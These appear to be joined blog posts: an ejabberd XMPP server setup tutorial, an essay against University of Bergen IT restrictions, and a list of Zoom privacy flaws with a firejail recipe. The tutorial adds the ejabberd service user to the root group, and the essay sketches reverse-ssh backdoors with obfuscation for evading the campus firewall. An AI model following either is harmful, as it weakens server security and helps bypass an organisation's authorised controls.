Messaging continues to be of rise. The new generation is more willing to
send texts than to call. Communicating with an instant messenger has an
unique advantage over the old good email: you can easily send replies
over replies quickly, resulting in a dialogue. But there is a serious problem:
many of the instant messengers are commercial products that work such that
their "users" are in fact the exploitable resource having no control or
choice.
Most corporations are fair providers of various products and services we
can buy. But not these "Big Tech" that offer "free applications," including
instant messengers. There is, obviously, nothing free on the Earth. Then,
if you do not pay, then you are the product not the customer. The Big
Tech corporations exploit the "end-users" to suck out private data,
often for further resale. Nearly all of these messengers have centralised
architecture and the user's account is linked to the telephone number,
completely destroying privacy. The link to the telephone number is also
very inconvenient because you cannot get several accounts easily, this
requires obtaining several mobile subscriptions. It's just illogical,
expensive and silly. Centralized architecture dictates that the
communication is kept on the corporate servers
so theoretically many employees can read
messages by abuse.
Some of the products are advertised as end-to-end encrypted. But nearly
all of them are closed source so there is no way to check how this is
implemented and if and when the service owner can have access to private
messages content. Moreover, we have evidence for the opposite. Many
so called "end-to-end encrypted" messages are actually read by AI and human
contractors.
Even if communication is technically end-to-end encrypted, the company owns
and fully controls the server, the client application and network traffic, so
a man-in-the-middle attack by silently changing certificates is possible
(e.g. in the context of lawful intercept, or unlawful abuse). Metadata
(technical information information about all aspects of communication,
including the addressees, their locations, IP addresses, telephone number
etc.) is always accessible to the service. But metadata is often even
more informative than the message content. How such metadata is used is
typically unclear. The user has no authority here at all.
Nearly all of these messengering systems have closed proprietary protocol. This
means that how you use the product is completely controlled by the owner
company. The only way to use the product is with the official application.
You cannot just choose for yourself which application program to use. This
is cardinally different from the email, for example, where you can use the
provider's web interface, its mobile app or any of the many available email
applications such as Thunderbird or
K-9 Mail. With such a third-party application you
can easily consolidate several email accounts in one place and easily make
use of the functionality the provider does not offer, such as end-to-end
encryption. Another
major problem is monopoly and lack of interoperability. The "users" (in
reality, the exploited resource) are completely restricted to the owner's
platform and are unable to communicate with the other (especially competing)
platforms (e.g. Facebook to Snapchat) as a way to keep users within the silo.
This is as if you were unable to call/send sms across different mobile
operators. And this is silly. To break down monopoly, ensure fairer
competition and interoperability across the services, the EU has developed
the Digital Markets Act (DMA) regulation.
This is a big step, but it does not solve many of the problems with
centralization, privacy and regular security flaws.
Take back your freedom, privacy and security
So, why use the restricted, inconvenient, monopolistic, insecure and
non-private platforms for the trivial task of sending instant messages? There
are several ways to configure one's own privately controlled instant messaging
system: XMPP and Matrix. XMPP is
lightweight, easy to install, and more private and
secure, yet covers all the typical
instant communication purposes: text, file share and voice. Moreover, XMPP
servers are by default
federated:
it is easy to send messages across the different servers like in the email.
There are many different applications for all operating systems and
platforms the user can choose. Update: XMPP can
communicate with federated Matrix network because ejabberd now implements a
Matrix
gateway.
It is very easy to set up one's own XMPP server for a small group,
company,
the family or just an individual. You will need
two things:
-
Server that will be the central hub for the communication network running
24x7. This can be anything, from a Rasberry PI in a cupboard to a Virtual
Private Server
(VPS) somewhere in a data centre or just an old PC running in your
basement. A small scale VPS useful for an XMPP server can be very cheap,
up to a three Euro per month. There exist even cheaper options, such as
EUR 6 per year. There are also dedicated search engines
to help locate cheap VPS, e.g. LowendBox
and ServerHunter.
A typical operating system running on the server is Linux (very secure,
highly configurable, free and open source).
-
Domain name that needs to be used to connect to the XMPP server. Domain
can be registered to the user (e.g. myname.no
), which costs about 30 Euro
yearly. But a sub-domain can be obtained for free using the
https://freedns.afraid.org or similar "free
DNS" services. In the later case you might have something like
myownchat.mooo.com
or myownchat.ptchat.net
.
Freenom offers free domains ending .tk
, .ml
.ga
,
.cf
, .gq
. It is possible to run the XMPP server purely on IP address even
without domain name, but it is much less convenient (e.g. then federation
with other servers is lost).
Given you have got a server (VPS or dedicated machine) and the domain,
configuring an XMPP server can be done on 1-2-3. There exist several Linux
variants (distributives) with different management commands (usually for
installing software). I assume Debian Linux
is used below (the same commands also work for Ubuntu and other Debian-based
Linux systems).
1. Install XMPP server software
Login. When you have got a server of any kind, you need tologin
to it, typically with ssh
:
here the user name on the server is debian
and the server ip
is 1.2.3.4
. Typically, you may need to create the ssh key and
upload it to the server to authenticate (refer the server documentation, e.g.
this).
I assume logging-in is not a problem.
Prepare server. First of all, update the software on the new server
sudo apt update -y && sudo apt-get upgrade -y
Install some useful monitoring and security-enhancing utilities
sudo apt install -y mc htop atop nload nmon tree zip pwgen fail2ban dnsutils iptables-persistent locate unattended-upgrades
Install certbot, a system that manages the
TLS certificates
for secure connection
sudo apt -y install certbot
Install the ejabberd server, which is is very
reliable and light on resources
sudo apt install ejabberd
Firewall. To allow incoming network access to this server by the XMPP
clients and also third-party servers, the server needs to configure
the firewall rules. This can be done differently in different
installations. For example, some VPS may do this using a friendly web
interface. The standard Linux firewall is done via iptables
.
The XMPP system requires incoming acces via ports 5222, 5223, 5269, 5443,
5280, 3478. To determine the ports refer to the listen section of the XMPP
configuration file below.
sudo iptables -A INPUT -p tcp --dport 5222 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5223 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5269 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5280 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
# STUN is over udp
sudo iptables -A INPUT -p udp --dport 3478 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
The port 7777 is used for a proxy for peer-to-peer (bytestream) file
transfer. If peer-to-peer file sharing is intended for use, an additional
rule should be set allowing incoming connections:
sudo iptables -A INPUT -p tcp --dport 7777 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
To see what firewall rules are in effect issue this:
iptables -L --line-numbers
It makes sense to save the iptables rules so they are automatically get in
effect after reboot
iptables-save > /etc/iptables/rules.v4
2. Configure your XMPP server
Secure connection certificate. Get a free
Let's Encrypt
TLS certificate.
I assume you have got a free domain myownchat.ptchat.net
from
https://freedns.afraid.org.
Note that ejabberd can manage (issue and update) TLS certificates on its
own, but this needs some configuration as described in the
acme
configuration option:
https://docs.ejabberd.im/admin/configuration/basic/#acme.
An advantage of the standalone certificate management system (as here) is
that it is slightly less tricky and can easily be used with a
web server on the same machine.
Why not also configure a web server for a small static web site here?
Ejabberd is very lightweight and will happily coexist with many other
servers running on the same machine.
sudo certbot --standalone certonly -d myownchat.ptchat.net
This command will ask a few questions and issue a TLS certificate. This process
is done over http so http port 80 must allow incoming connections. If this is
not so, use the following command:
sudo iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
Do not forget to save iptables rules with the iptables-save
as above.
The certificate files are located in
/etc/letsencrypt/live/myownchat.ptchat.net/fullchain.pem
directory.
For the sake of security, the certificate directories have by default no
access to anyone except the admin (root) user. But this precludes the XMPP
server ejabberd to access the certificate. This can be easily fixed with the
following commands
First, add ejabberd to the root group
sudo adduser ejabberd root
Second, allow access to the certificate directories to the group
sudo chmod g+rx /etc/letsencrypt/live/myownchat.ptchat.net
sudo chmod g+rx /etc/letsencrypt/live
sudo chmod g+rx /etc/letsencrypt/
Configure ejabberd. Once the preparations are done, it is time to
configure the ejabberd messaging server. Edit the configuration file
(assuming the mcedit text editor is used)
sudo mcedit /etc/ejabberd/ejabberd.yml
This is a long configuration file that may look scary. But in fact only a few
changes are required to make the server running with the default options. But
note that the indents are important, try to keep them as in the original file.
Any line starting with #
is considered a comment, this can be easily used
to disable specific options by "commenting them out."
First, set up the host name that is used for the server, it is the same as
the domain:
hosts:
- myownchat.ptchat.net
Second, configure the location of the TLS certificates that are used by the
server:
certfiles:
- "/etc/letsencrypt/live/myownchat.ptchat.net/fullchain.pem"
- "/etc/letsencrypt/live/myownchat.ptchat.net/privkey.pem"
Configure the admin users who can manage the XMPP server:
acl:
admin:
user:
- ""
- "myname": "myownchat.ptchat.net"
Then, add configuration for http-file-upload module that will allow file
sharing (sending files):
mod_http_upload:
put_url: https://@HOST@:5443/upload
custom_headers:
"Access-Control-Allow-Origin": "https://@HOST@"
"Access-Control-Allow-Methods": "GET,HEAD,PUT,OPTIONS"
"Access-Control-Allow-Headers": "Content-Type"
It is convenient to keep the latest messages on the server, it is done with
the "mam" module:
mod_mam:
assume_mam_usage: true
default: always
Ejabberd supports several other communication protocols in addition to
XMPP. For example, it also works with MQTT that is
typically used for IoT devices. If this functionality is not used,
just comment out the MQTT module to disable it.
The STUN and TURN protocol is mainly used for voice calls and needs the
actual IP address of the server (replace with your server IP addfress)
-
port: 3478
ip: "::"
transport: udp
module: ejabberd_stun
use_turn: true
## The server's public IPv4 address:
turn_ipv4_address: "1.2.3.4"
An important issue is wether to allow anonymous registrations of new users.
I strongly recommend not allowing this for security reasons. For a small
private server, you will normally add users manually and set them initial
passwords. Every user can then change password within the client program. So,
you need to disable the mod_register
by commenting it out:
# mod_register:
# ## Only accept registration requests from the "trusted"
# ## network (see access_rules section above).
# ## Think twice before enabling registration from any
# ## address. See the Jabber SPAM Manifesto for details:
# ## https://github.com/ge0rg/jabber-spam-fighting-manifesto
# ip_access: trusted_network
Start server! And that's all minimal configuration. Now it's time to
start the server:
sudo systemctl start ejabberd
If there are any errors and the server fails to start, Linux logs can be
inspected with this command:
or logs for only ejabberd:
sudo journalctl -xe --unit ejabberd
Additional stuff. The above is enough to make the XMPP server running for
text. If voice is required, you need to configure the DNS as described here:
https://www.process-one.net/blog/how-to-set-up-ejabberd-video-voice-calling/.
DNS is normally configured using the control panel of the domain registrar.
The TLS certificate that is managed by certbot
is updated each 90 days. This is an automatic process, but the ejabberd
server must know when certificate is changed. This can be done using the
deploy hook. Just create the hook file reloadxmpp.sh
(the file name can be
anything):
sudo mcedit /etc/letsencrypt/renewal-hooks/deploy/reloadxmpp.sh
and add the following commands:
#!/bin/sh
ejabberdctl reload_config
This file must be executable, so issue this command:
sudo chmod ugo+x /etc/letsencrypt/renewal-hooks/deploy/reloadxmpp.sh
The last note on the server is that it should be regularly updated for
bug fixes and security updates. This is done automatically by installing
unattended-upgrades
above. Yet, it is a good practice to log in regularly
over the ssh, check logs and update the system:
sudo apt update -y && sudo apt-get upgrade -y
3. Configure the XMPP users and client application
Register new users. First, you need to register the XMPP users. The
quickest method is to use the command line on the server, the command
ejabberdctl
has advanced functions.
A secure random password can be generated withy pwgen
, e.g. the following
generates passwords with 18 symbols:
It normally generates an array of possible passwords to choose from.
Now, to register the user myname
, It is the admin user configured in the main
configuration file /etc/ejabberd/ejabberd.yml
above.
# user domain password
sudo ejabberdctl register myname myownchat.ptchat.net pee8chogh9Heel6hei
Other users can be configured similarly. Note that the full user name for XMPP
has the same format se email: myname@myownchat.ptchat.net
. This is due to
the federated nature of both systems: you need to know both the user and
the server with whom to communicate.
For this example let's register two additional users:
sudo ejabberdctl register john.dow myownchat.ptchat.net ohyeeLeefo9yief4gu
sudo ejabberdctl register anna.karenina myownchat.ptchat.net hejo7phiy2iFeW9She
Use! The final step is configure the client program on the
user's device. The biggest difficulty at this step is the plenty
of choice. For any major platform, one can choose any of the many
available XMPP client programs. Some email
programs, e.g. Thunderbird also support
XMPP (although only a limited subset of features). Check out the
https://xmpp.org. The configuration for the client
is simple:
-
Server: your server, in the example above it is myownchat.ptchat.net
-
User name: your user name. In the example we used above, it can be
myname
Note that the option to create new account must NOT be enabled as
long as the account has already been created on the sever and the in-band
registration (mod_register
, see above) is disabled for
security.
Some programs accept the full user name without specifying user and domain
separately. Then the user is just myname@myownchat.ptchat.net
. If you
plan to use the peer-to-peer (bytestream) file transfer (but
this is not mandatory), you should also find where the file transfer proxy is
configured and set it with the proxy
subdomain, for our example it should be
proxy.myownchat.ptchat.net
. And that is all for basic client configuration.
I recommend the Blabber XMPP application for
devices running Android. Yaxim is the best option for
minimalists, it is notoriously miniature (only a few megabytes) and works great
even on the oldest and weakest devices. Miranda NG
is a powerful XMPP client program for Windows. There are also a few
web-based clients: https://conversejs.org/ and
https://web.xabber.com/ that you can try right
away without installing anything.
The final step is to fill the contact list (called roster) with the addresses
of the people (or maybe devices, because XMPP can be easily configured for
bots accepting commands). Just remember that the address is full name as in
email: user@server.domain
. One useful option is so called Shared roster
groups: then you can configure
a group of contacts without the need to add them manually.
Happy chatting!
Further
There are many advanced options and possibilities in ejabberd. Just check
the documentation at the official web site: https://www.ejabberd.im/
and documentation https://docs.ejabberd.im/.
There are also a few useful tutorials, e.g.
https://www.process-one.net/blog/how-to-move-the-office-to-real-time-im-on-ejabberd/
Main points
-
Any major university IT infrastructure is huge and heterogeneous, it is
used by lots of people, many of whom are experimenters and explorers,
who like challenge, rather than office robots. Most users are busy,
focus on research and study and hate additional (and especially sudden)
hassle. This is why consideration of the usability cost is absolutely
critical for IT security strategy.
-
Creating a walled "trusted" area by a firewall--the perimeter model--is
an outdated approach to security at the age of universal zero-trust
deployment. Instead of following an already outdated approach, a more
sensible strategy is to start implementing components of the zero-trust
model, including score-based trust and wide use of personal identity
hardware tokens.
-
Major focus in security should be shifted from solely technology components
to the end users, creating incentives to use more secure technology,
rather than making additional hassle.
The great firewall
There was a very rapid trend towards an increasingly restrictive IT policies at
the University of Bergen implemented from October this year. While the aim of
“Increasing security” is laudable, I think the planning and implementation
of the policies has several flaws which may compromise its declared aim. The
biggest problem is that the UiB IT is huge and heterogeneous. There is a
variety of services with different levels of security risks, many users,
with diverse needs, user cases and environments, competences, personal
backgrounds and personalities. This requires a more sensible, flexible and
inclusive approach. If this is not the case, rigid policies will not make
the IT environment significantly safer. Instead, it may hamper normal work
for some users, and in the long run compromise both security and privacy
contrary to the declared aim.
Security, including the computer security, is not a fixed state, it is
rather a continuous process. Security is not limited solely to the IT
technology. Technology alone cannot bring security. Security is primarily
a human rather than technical problem. Indeed, most dangerous security
breaches did not target encryption algorithms, many even only partly involved
exploitation of software and hardware vulnerabilities. They typically make
use of human factors, such as social engineering, trust exploitation, human
mistakes and so on. Successful tracking and catching cyber criminals do not
often primarily target technology, but usually depends on exploiting
human errors, negligence, laziness and other similar factors. This is why the
current primary focus on just technological restriction of the IT environment,
aimed barely to its isolation from the outside networks, is neither sufficient
nor efficient. A more balanced, flexible and holistic approach is needed.
Security can only work at a balance with usability. Moreover, there is
often a trade-off: technological security restrictions often make for worse
usability. A completely “sealed” environment would be just too restricted
to be usable. Usability is indeed a primary factor: research shows that many
security problems and users’ hesitance or unwillingness to make use of
(more) secure tools is caused by their imperfect usability. Furthermore,
within a hugely heterogeneous environment, there would be no single optimal
balance between security and usability. An important consequence of this
is that a flexible and inclusive approach to security, aimed at different
degrees of balance with usability, is important.
The technical part of security should start and primarily respond to specific
threat model(s), not theoretical or vaguely possible risks. And the threat
model(s) should be connected with the real life statistics, e.g. how many
breach attempts usually occur, to which of the services, from which IP
addresses etc. It does not make sense to install solid steel screens on
all windows in our department building to make it “more secure” from
any kind of possible breaches; even if there are crowds of hungry zombies
walking outside, it is just enough to protect the first floor.
Blanket unconditional restriction of the UiB IT network environment as is
being implemented does not seem to respond to specific consideration of threat
model(s), the variety of users, needs, sub-environments etc. It looks like
a desperate attempt to seal everything in a hope that a jailed environment,
isolated from the outside, will be more secure. This is a wrong assumption.
Some specific problems
Multi-factor authentication via TOTP: Not a panacea.
KI
0780
introduced multi-factor authentication policy. This is generally a crucial
component to improve security, if implemented sensibly. However, not all
implementations would automatically improve security or provide a sufficient
balance between security and usability. What is called “multi-factor
authentication” may not even be really multi-factor. The definition
of multi-factor authentication involves the use of several things for
authentication, typically something you know: password, plus something you
own, e.g. a mobile device (SIM) and something you are e.g. fingerprint. If
the password is entered using the password manager software saved on the
mobile device and the “multi-factor” SMS comes to the same mobile device
(or password entered and SMS read on the same computer that links to the
smartphone as is now the norm within the Apple ecosystem), the whole idea of
two factors is ridiculed: the smartphone becomes the single authentication
device. It can be at best called “two-step authentication,” a weaker
mechanism. The SMS (and anything based on phone-line or phone-number) is
actually one of the poorest authentication means due to the long known and
essentially unsolvable vulnerabilities in the GSM, SS7 and other related
protocols. SMS can be hijacked by malicious smartphone apps (e.g. Google Play
store does not even approach 100% safety, there are occasional scandals with
malware in apps with very substantial audience) or even basic GSM dumb phones
(there are reports about quite a few Chinese-made GSM button-phones having
factory-installed malware). Worse still, some of the modern and widespread
multi-factor mechanisms such as push-based popups are also easily exploited
(even worse, they make for a bad habit of clicking “approve” without
thinking). If authentication is done on a web page, it is usual to save
the authentication cookie to avoid repeated two-factor invocation. However,
cookies are not necessarily secure, long kept cookies might be hijacked by
malware, there is a well known mechanism of CSRF attacks, there is also a
big privacy drawback (e.g. tracking). The current industry trend is to go
away from the cookie mechanism in the mainstream browsers (e.g. Google Chrome
will not allow any third-party cookies from 2022). A sensible user policy is
to reduce the lifetime of any cookie. However, it makes the “two-step”
authentication as is currently implemented at the UiB a hassle. Indeed,
the user then has to go via the SMS code process nearly every time he
or she logins, even if it is done from the same IP address and the same
device.
The ssh access to the login.uib.no
server have apparently disabled the
best-practices secure mechanism of ssh-key authentication (incidentally,
if the key is combined with a passphrase then it is actually a two-factor
authentication itself!) and forced the potentially week password-based
mechanism with SMS code. There seems to be no other TOTP mechanisms except
SMS at the time of writing!
A better mechanism is to use the time-based one-time password code (TOTP)
authenticator application on the mobile phone. This is in fact recommended at
the Microsoft and UiB web pages as a more secure alternative (via Microsoft
authenticator app). While TOTP is better than SMS, it is far from perfect
because it is potentially vulnerable to phishing and the MITM attack and
the secret seed should be kept on the authenticator application as well as
on the server to make synchronised generation of TOTPs possible.
Personal hardware tokens
There is a much better and stronger two-factor authentication mechanism:
U2F and FIDO2/WebAuthn that use hardware security device keeping
the private key. The security token, in the form of a small USB or
NFC key can both authenticate on the server and authenticate the server
itself with strong asymmetric crypto, making phishing and many other attacks
virtually impossible. Many such devices also implement biometric
(e.g. fingerprint) identification with privacy-respected way (e.g. biometric
data is not sent from the user's device). This is now a mature technology
that is implemented in all major web browsers, can be used with ssh key-based
authentication, GPG-enabled email etc.
The best known hardware token is probably the
Yibikey and there are a few others on the market
(e.g. Google Titan, FEITIAN, Token2, Thetis etc.). They can be not very cheap,
but not prohibitively expensive either.
VPN needed for all, even the most essential everyday services
The UiB IT services have previously used several open and industry-standard
VPN mechanisms (IPsec, OpenVPN) so that different users could easily find a
solution working for them individually. Now, there is a single closed and
proprietary mechanism: Cisco AnyConnect including both unique protocol
(SSL-based) and the software client. This mechanism may work for many
but not necessarily for everyone (e.g. unlike open solution, it may not
be available on some computing platforms, some enthusiasts of the open
source might find restriction to a single proprietary tool unethical,
etc.). There are rumors about unreliable connections with Cisco AnyConnect,
and that OpenVPN was previously more stable for some users. It is indeed
likely if Cisco AnyConnect is used over certain restrictive environments
with DPI that block connections to certain ports or UDP traffic even at
the 443 port, or otherwise censor VPNs (e.g. some public WiFi networks may
have such limitations). Some implementations of the OpenVPN, in contrast,
can be configured to mimic normal SSL web traffic (e.g. shadowsocks) and
work even under the Great Chinese firewall. There is a clear benefit at not
prohibitively high cost to provide at least some limited support for such a
mechanism for certain users (e.g. special needs or during travel). It might
even be provided only on special request with some substantiation. Also, the
reliability statistics internally used by the IT department might be biased
if not all users report minor and transient VPN issues. So there is a case to
deploy and support alternative VPN solutions, perhaps even on a smaller scale.
It sounds quite reasonable that providing and supporting a wider choice of VPN
solutions for a minority of users would not be economically feasible. However,
it is certainly not the case when just all the services become available
only from within the UiB internal network jail. Then, there should be more
flexibility and inclusion, several ways to get into a jailed environment
comfortably by a variety of users in different environments. It is just too
unbalanced limitation to mandate the use of a single restricted VPN to get
email from home or from an airport, for example. A better alternative is of
course to relax the policy moving at least the most essential but inherently
secure services out of the jail.
Is the universal jail really essential for everything?
One issue with unconditional moving of all the UiB IT services into a jailed
environment is that this would not reflect sufficient balance between security
and usability. It is of course good to keep potentially less secure services
(e.g. RDP) jailed. But are real threats substantial enough to hide just
everything into such a jail?
Are there any real-life statistical or other data evidencing that accessing
the university email system from an IMAP client with normal SSL/TLS protection
can be dangerous? The user in such a case does not need to enter the UiB
password for login (it is saved into the software, often encrypted on devise),
so phishing risk is near zero. The authenticity of the IMAP server certificate
is usually checked through the standard SSL mechanism. So is there any real
security advantage to move such essential everyday tool as email into the
jail, does this just induces additional hurdle?
Another example is connecting the UiB login.uib.no ssh server. Many (presumably
less advanced) users can use the ssh with their default password. Then,
the “two-factor” authentication is a serious security improvement of
course, even if it is in fact used in the weakened two-step authentication
mode. However, some other users can configure ssh-key authentication,
which is a much more secure mechanism. Will the manual entry password with
two-factor authentication really provide sufficient security improvement
in such a case? Will it provide anything beyond a negligible effect if the
user has already authenticated with SMS on the same device, or a different
device from the same IP address shortly before? Is there any improvement in
security that substantiates such degradation of usability?
The question is this: is the same level of restriction and jailing really
essential for all services, often and rarely used, potentially less secure
and highly secure, easy and difficult to exploit, those with documented
attacks and those that present little interest to intruders? Does not it
just provide usability costs not balanced by any security improvement?
Human ingenuity: Is the jail actually made of paper?
It is clear that equally and unconditionally restricting just everything,
especially, without considering usability costs, will not automatically
increase security. The situation can well be worse: lower security as
well as compromised privacy.
For example, to avoid all the nuisance, users may switch to using third-party
commercial providers, such as increasingly use private gmail.com accounts,
Dropbox etc. Users may use smaller, more cryptic online tools and applications
(e.g. file sharing sites, communication tools, some advertised as encrypted)
with uncontrollable and unknown security. Some of them might be owned and
run by community and volunteers, some could be compromised or deliberately
devised to gather data, track users and spy.
Some of more qualified "insider" users might successfully hack the system
to get nuisance-free access to the UiB jailed environment from outside. It
is actually not a hard problem. One possible solution is to use the reverse
ssh
proxy. It does not even require administrative rights and can be done
by a motivated average level computer user after 20 min of reading the
ssh
manual. More advanced users can create stable backdoors implementing
such things as proxy jump and port forwarding that will sustain reboots,
logouts etc. It is also easy to add various layers for plausible deniability
and obfuscation.
There are much more tools, ways and possibilities to implant and efficiently
hide a backdoor into the UiB jailed environment. All that is required is
various open source components freely available on the net and an incentive
to do such unauthorized actions. It is not just an abstract theoretical
threat but real and serious risk left behind the current jailing policy.
Imposing a jailed environment without considering trade-off of flexibility
and usability has this biggest problem: It may create an incentive to break
the rules to make life more hassle-free. A related and serious problem
is that the IT department would not be able to control this and in most
cases will remain unaware of the issue. It is virtually impossible to detect
that users communicate and share sensitive medical or personal data over a
private google mail account, for example. A cryptic backdoor implanted on
the computer within the UiB jail with sufficient plausible deniability can
remain long undetected without costly and tedious forensic analysis. But
such an analysis will be conducted only by the police after a catastrophic
break-in has occurred, too late.
There are many advanced users, smart students, at the university. Many well
understand (and they do discuss!) the inconsistency of the restrictive jail
policies. Some people may find it quite fun to overcome the silly rules
imposing unneeded hassle. It can indeed be an interesting challenge but,
unfortunately, an additional incentive.
A further problem is that many users usually do not bother to report
smaller or transient problems at the normal issue tracking channels such
as hjelp.uib.no. They may not be acquainted with it or just consider it a
hassle if they are very busy (and they are very busy with real things to
hang at tangential IT problems). A quite typical way of action is to ask
someone nearby for a help or workaround. Therefore, if the knowledge of
the ways for implanting backdoors and the obvious fact that it is quite
easy and just solves the problem, is spread within the student and staff,
it can create a real security disaster. Unfortunately, backdoor skills are
very likely to spread if the IT department continues to create more and more
restrictive jail and provide more incentives to break the rules. Then, it
would be essential to further tighten the jail: inspect all devices on entry
and refuse entry to everyone with IQ > 0.60. The simple fact is that the
jail that is being happily built is not made of rock and steel, it is paper.
The situation at the UiB is quite different from a typical commercial
organization that the standard security recipes are based upon. There
are many brilliant students and staff out here, many are young and like
challenges. There can be those who would not hesitate to take risk, given
the benefit of making one’s own hassle-free environment is high, the cost
is zero while expected risk is rather low. Making a backdoor is indeed a
way of learning technology that is fun and another added incentive. Many
folks are already aware of various software tools and know how to use their
black magic. People are ingenious, and people at UiB are on average much more
ingenious than outside. What is the threat model for developing the jailed IT
environment? Is to protect the UiB from outside hackers? It is a wrong model
because many such hackers are already within the jailed environment and are
ready and to get the challenge to punch its feeble paper walls from inside.
What should be done?
Inconsiderate and inflexible jailing of the UiB IT networks should certainly
be slowed down before it is too low and people started using third-party
tools and making their own unauthorized solutions. There should be a serious
analysis on what must be implemented and over which time scale so the users
can get acquainted and do not just suddenly get huge hassle. As to now,
the “analysis” seems to be mainly focused on “what is suddenly broken
down once we put everything into a jail”; this is not acceptable. The
policies should not be based mechanistically on some manual made for a
different type of environment, they should be inclusive, flexible enough to
adapt to the complex, diverse and heterogeneous UiB environment. The main
focus should switch from technology to people: how to reach most of them
(they are busy!), make security improvements minimally obtrusive, teach very
busy people sufficient security skills without much hassle. Specifically,
the most important information should not be sent by global mailing list
that may disappear in user’s mail filter, but must be directed personally
to each user (it isn’t prohibitively hard to write a script for this,
substituting %NAME%
with the real user’s name).
The technological part of the solution should develop sensible threat models
based on attack and usage statistics. It should be governed by real risks
rather than desire to just protect everything quickly and at all costs. Some
of the restrictions already applied can be relaxed. A reasonable solution is
to apply more sensible score-based security mechanism, e.g. including
IP based rules for two-factor or two-step authentication. Some of more
secure services, can for example, be available without firewall restriction
if the user comes from his/her frequently used Norwegian home IP address
(to improve usability while still reducing potential attack surface). This
efficiently transforms a jail into a continuum adapting for the threat
and uncertainty level. It will also pay back to demonstrate the practical
benefits of client-side certificate authentication, OAuth2 and similar more
phishing-resistant security token mechanisms (e.g. they can relax the need in
TOTP/SMS authentication) to all users. The university should also facilitate
much wider use of hardware-based authentication devices, such as YubiKey,
for proper two-factor authentication, perhaps even distribute such devices
freely in some groups if universal deployment turns out expensive. Such
personal identity verification hardware devices are actually a crucial
component of modern zero-trust security approaches.
The crucial element of the whole policy is to create incentives for using
more secure tools. For example, the use of hardware personal identity
verification tokens should allow to bypass all or most restrictions,
perhaps even the need in VPN. There would currently be little added risk
with such a policy, but the users would be much happier to do their work
securely whenever they need without hassle. This would require hard work,
additional integration and funding. But educating, helping and cooperating
with users—not restricting and obstructing them—would be the only viable
strategy to achieve increased security in the University environment in
reality, not just on paper.
Zoom privacy and security problems
Zoom has demonstrated significant negligence with respect to
cybersecurity. Additionally, the company has shown aggressive marketing
campaigns and was caught at providing false information to its end users.
-
Zoom aggressively forces the user to download and install native
application rather than use web browser for videoconferencing even
though videoconferences will work in the web browser. This is a little
suspicious. Browser-based conferences are more convenient for an occasional
user and is safer due to browser sandboxing of network applications.
-
Serious security deficiency on the Apple Mac platform allowing
any unauthorized remote attacker to activate web camera, connect
to a conference and execute denial-of-service attack. Zoom tried
to ignore and deliberately hide information about the very serious
security vulnerability and was slow to fix it.
See here for more details,
and here
(technical information is
here and
here).
Zoom management response seem to point to quite irresponsible corporate
culture.
-
More recently it appeared that Zoom was sending users' data
to Facebook servers without the user's consent. This is now fixed. See
Vice paper
and this follow-up.
-
Zoom was caught at providing false and misleading information that the
videoconference has "end-to-end" encryption while this was not so. Check out this.
The explanation for this provided by Zoom is unsatisfactory.
-
Zoom had a serious security vulnerability that could lead to
user password leak in Microsoft Windows.
See here for details.
-
Zoom has a strange privacy policy that, even though states that "privacy
is very important to us," requires quite large collection of private user's
information. There is little explanation about to why this information
is collected. Unlike many other similar companies, Zoom does not release
transparency report(s). See here: https://zoom.us/privacy
-
Electronic Privacy Information Centre has filed complaint to FCC
- alleging that the videoconferencing company Zoom has committed unfair
and deceptive practices in violation of the FTC Act. According to EPIC,
Zoom intentionally designed its web conferencing service to bypass
browser security settings and remotely enable a user's web camera
without the knowledge or consent of the user.
-
See more details here
-
There is a growing concern on the privacy deficiency in Zoom,
for more details see this and
this.
Also see The Guardian.
-
Recently SpaceX has banned Zoom because
of privacy concerns, see
here for details.
-
Zoom has close links with China. Even though the intellectual property,
management and marketing are based in the USA, many if not most developers and
engineers are bsed in China (see Form S-1 registration statement). This
can potentially lead to serious privacy and cybersecurity issues, given
the Chinese regime tightening of Internet regulation (censorship, privacy
etc.). One example is MLPS 2.0 legislation, 2019 mandating China residents
and any foreign companies unrestricted access to user data. (In China, Zoom
has a network of agents acting under different names but using the same
platform. )
Updates: More on Zoom problems
-
Vulnerabilities:
-
Privacy holes:
-
CitizenLab Report on Zoom:
-
Google now banned Zoom for its employees: Google has banned the popular
videoconferencing software Zoom from its employees’ devices, BuzzFeed
News has learned. Zoom, a competitor to Google’s own Meet app, has seen an
explosion of people using it to work and socialize from home and has become
a cultural touchstone during the coronavirus pandemic.
Read here.
-
Zoom zero-days for sale: People who trade in zero-day
exploits say there are two Zoom zero-days, one for Windows
and one for MacOS, on the market. See here for more detail.
-
Zoom is using the microphone even when not in meeting on MacOSX.
Why is the Zoom app listening on my microphone when not in a meeting?
An update fixed the problem... but NOT with microphone being activated, but with interface: microphone indicator.
Zoom nevertheless continues to activate microphone on MacOSX. Is CCP listening?
How to increase privacy and security of using Zoom on Linux
Sandboxing. On the Linux platform, one solution is always to run Zoom
videoconferencing software only in a limited sandbox. Then, Zoom client
would not have access to user's files and other processes running on the
system.
- Update: This recipe works for Zoom v. 3.5.361645.0301, but not for some
later versions, e.g. 3.5.374815.0324, see update below on this.
Disable any unauthorized update/upgrade of Zoom client. Do not install
Zoom software via the standard reopository. Use static tar.gz archive
instead. Select Other Linux OS for installation. Uncompress the static
distribution in a safe directory. Disadvantage of this is that update is
only manual, check out Zoom web site for new releases and read changelog. But
advantage is that zoom cannot silently install any unauthorized update or
software on the system.
It also makes sense to register at Zoom with the institutional email but
separate password, so Zoom does not use the main institutional login (SSO
login). This might help against credentials leak in case of Zoom software
vulnerability. Using the institutional email to register would ensure Zoom
is registered as "licensed."
Install firejail sandboxing. https://firejail.wordpress.com/:
sudo apt install firejail
.
- Firejail is a SUID program that reduces the risk of security breaches
by restricting the running environment of untrusted applications using
Linux namespaces and seccomp-bpf. ... Firejail can sandbox any type
of processes: servers, graphical applications, and even user login
sessions. The software includes security profiles for a large number
of Linux programs: Mozilla Firefox, Chromium, VLC, Transmission etc. To
